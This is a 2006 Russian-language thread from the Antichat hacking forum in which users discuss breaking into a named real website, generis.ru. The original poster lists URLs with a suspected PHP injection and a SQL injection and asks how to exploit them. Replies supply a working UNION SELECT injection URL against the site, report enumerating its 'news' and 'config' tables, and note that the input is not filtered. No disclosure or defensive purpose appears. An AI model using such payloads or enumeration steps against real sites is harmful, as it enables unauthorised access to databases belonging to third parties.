ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

php-inj & sql-inj на generis.ru
  #1  
Старый 28.01.2006, 00:44
Аватар для gimlis
gimlis
Новичок
Регистрация: 25.01.2006
Сообщений: 8
Провел на форуме:
76510

Репутация: 2
По умолчанию php-inj & sql-inj на generis.ru

На этом сайте найдены
http://www.generis.ru/
потенциальная php-inj
http://www.generis.ru/?page=qwe
и потенциальная sql-inj
http://www.generis.ru/?page=press_wholenews&id=qwe
Вот я нашел уязвимости, как ими можно воспользоваться?
 
Ответить с цитированием

  #2  
Старый 28.01.2006, 01:07
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Цитата:
Сообщение от gimlis  
http://www.generis.ru/?page=press_wholenews&id=qwe
Вот я нашел уязвимости, как ими можно воспользоваться?
По моему там только SQL Injections а пхп иньекций там нет то просто ошибака стиля вроде....
 
Ответить с цитированием

  #3  
Старый 28.01.2006, 01:19
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

SQL-inj красава =))
пхп-инъекции к сожалению там нет... если толкьо локальных html-страничек.. но это ничего не даст..
 
Ответить с цитированием

  #4  
Старый 28.01.2006, 01:26
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Цитата:
Сообщение от Rebz  
SQL-inj красава =))
а чем плоха разнообразие как никак чел хоть ' не пихает как все (и я тоже ' пихаю)
 
Ответить с цитированием

  #5  
Старый 28.01.2006, 09:14
Аватар для gadjet
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418

Репутация: 23
По умолчанию

Да, там скуль инъекция
http://www.generis.ru/?page=press_wholenews&id=-1+union+select+1,'blablabla',3,4,5,6/*
Далее подбирай таблицы
 
Ответить с цитированием

  #6  
Старый 28.01.2006, 10:38
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию

нашёл таблицу news но толку дамаю мало буит от этой таблицы)))

Последний раз редактировалось D1mOn; 28.01.2006 в 10:40..
 
Ответить с цитированием

  #7  
Старый 28.01.2006, 13:01
Аватар для gadjet
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418

Репутация: 23
По умолчанию

Да, действительно, толку мало...
 
Ответить с цитированием

  #8  
Старый 28.01.2006, 18:45
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

еще таблица config
но столбцы не подобрал
 
Ответить с цитированием

  #9  
Старый 29.01.2006, 00:15
Аватар для gimlis
gimlis
Новичок
Регистрация: 25.01.2006
Сообщений: 8
Провел на форуме:
76510

Репутация: 2
По умолчанию

Цитата:
Сообщение от gadjet  
Да, там скуль инъекция
http://www.generis.ru/?page=press_wholenews&id=-1+union+select+1,'blablabla',3,4,5,6/*
Далее подбирай таблицы
там можно и без /*, запрос не фильтруется вообще и дальше по запросу ничего нет.
 
Ответить с цитированием

  #10  
Старый 29.01.2006, 02:30
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

Цитата:
там можно и без /*, запрос не фильтруется вообще и дальше по запросу ничего нет.
Разве это что-то меняет?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ